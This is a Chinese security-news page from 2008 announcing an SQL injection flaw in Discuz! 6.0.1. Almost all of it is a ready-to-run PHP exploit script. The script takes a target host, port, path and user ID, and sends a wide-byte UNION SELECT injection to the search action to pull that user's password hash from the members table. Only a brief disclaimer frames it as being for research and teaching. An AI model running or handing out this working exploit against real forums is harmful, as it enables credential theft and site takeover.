热点资讯 |软件学院 |软件工具 |下载软件 |影院快车 | 设为主页 | 加入收藏

骇安网海量绿色软件免费下载

您现在的位置: 骇安网 >> 安全快报 >> 漏洞公告 >> 正文

    Discuz! 6.0.1 又被SQL Injection啦

    作者:未知    新闻来源:本站原创    点击数:    更新时间:2008-9-10

    以下程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
    <?php
    error_reporting(E_ALL&E_NOTICE);
    print_r("
    +---------------------------------------+
    Exploit discuz6.0.1
    Just work as php>=5 & mysql>=4.1
    BY  james
    +------------------------------------------+
    ");

    if($argc>4)
    {
    $host=$argv[1];
    $port=$argv[2];
    $path=$argv[3];
    $uid=$argv[4];
    }else{
    echo "Usage: php ".$argv[0]." host port path uid\n";
    echo "host:      target server \n";
    echo "port:      the web port, usually 80\n";
    echo "path:      path to discuz\n";
    echo "uid :      user ID you wanna get\n";
    echo "Example:\r\n";
    echo "php ".$argv[0]." localhost 80 1\n";
    exit;
    }

    $content ="action=search&searchid=22%cf'UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=".$uid."/*&do=submit";

    $data = "POST /".$path."/index.php"." HTTP/1.1\r\n";
    $data .= "Accept: */*\r\n";
    $data .= "Accept-Language: zh-cn\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "User-Agent: wap\r\n";
    $data .= "Host: ".$host."\r\n";
    $data .= "Content-length: ".strlen($content)."\r\n";
    $data .= "Connection: Close\r\n";
    $data .= "\r\n";
    $data .= $content."\r\n\r\n";
    $ock=fsockopen($host,$port);
    if (!$ock) {
    echo 'No response from '.$host;
    die;
    }
    fwrite($ock,$data);
    while (!feof($ock)) {
       echo fgets($ock, 1024);
    }
    ?>
最新更新 | 软件排行 | 关于我们 | 广告合作 | 帮助(?) | 网站声明 | 网站地图 | 友情链接